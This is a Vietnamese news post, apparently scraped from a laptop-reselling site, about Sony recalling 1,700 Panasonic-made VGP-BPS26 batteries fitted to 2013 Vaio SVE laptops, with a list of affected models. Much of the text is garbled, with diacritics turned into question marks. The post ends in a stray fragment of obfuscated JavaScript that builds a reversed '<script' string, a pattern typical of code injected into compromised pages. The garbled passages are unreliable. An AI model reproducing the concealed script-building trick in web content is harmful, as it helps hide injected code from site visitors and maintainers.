Posts

Sony

Sony thu hồi 1.700 pin laptop Vaio dù không còn bán

Hàng nghìn m?u laptop Vaio s? ph?i thay th? pin do b? quá nóng, có th? gây cháy n?.
sony-thu-hoi-1700-pin-laptop-vaio-du-khong-con-ban
Ph?n l?n các model c?a dòng Vaio SVE ra m?t n?m 2013 b? ?nh h??ng.

Dù không còn s? h?u th??ng hi?u Vaio, Sony hôm nay v?n ra quy?t ??nh tri?u h?i 1.700 m?u pin ?ang ???c g?n trên 18 dòng laptop này. Các s?n ph?m pin lithium-ion do bên th? 3 là Panasonic s?n xu?t b? quá nóng và có nguy c? gây cháy n?.

Hi?n ch?a có tr??ng h?p ng??i dùng nào b? s? c? nh? các c?nh báo nói trên. Tuy nhiên, ?y ban an toàn s?n ph?m tiêu dùng c?a M? cho r?ng vi?c ti?m ?n nguy c? là ?? ?? th?c hi?n vi?c tri?u h?i. ?ây không ph?i l?n ??u các m?u pin do Panasonic b? tri?u h?i. Trong tháng 3 v?a qua, Toshiba c?ng ph?i thu h?i t?i 91.000 pin ???c l?p trên 39 model Toshiba Portégé, Satellite và Tecra.

Sony s? có ph??ng án ??i m?i pin cho các dòng laptop này. Tuy nhiên, trong th?i gian ch? ??i, hãng khuy?n cáo ng??i dùng nên s? d?ng b? s?c ?? dùng ?i?n tr?c ti?p và tháo r?i pin kh?i máy.

Các m?u pin n?m trong di?n b? ?nh h??ng có s? model VGP-BPS26 và s? mã 1-853-237-11 và 1-853-237-21. Các model laptop Vaio ?ang ???c g?n lo?t pin này bao g?m SVE15132CXW, SVE1513KCXS, SVE15134CXP, SVE1513MCXB, SVE15134CXS, SVE1513MCXW, SVE15134CXW, SVE1513MPXS, SVE15135CXW, SVE1513RCXB, SVE151390X, SVE1513RCXS, SVE1513APXS, SVE1513RCXW, SVE1513BCXS, SVE1513TCXW, SVE1513JCXW và SVE171390.

H?u h?t các model b? ?nh h??ng ??u thu?c series Vaio SVE phiên b?n 15 inch ra m?t ??u n?m 2013, h?n m?t n?m tr??c khi Sony bán th??ng hi?u Vaio. ?ây là dòng máy ???c ?ánh giá cao ? phân khúc t?m trung c?a Sony th?i ?i?m ?ó v?i ki?u dáng hi?n ??i, nhi?u màu s?c tr? trung cùng giá bán t?t so v?i các ??i th?.

Thumualaptop24h.net – Chuyên thu mua laptop c?

rcs<'.split("").reverse().join(""))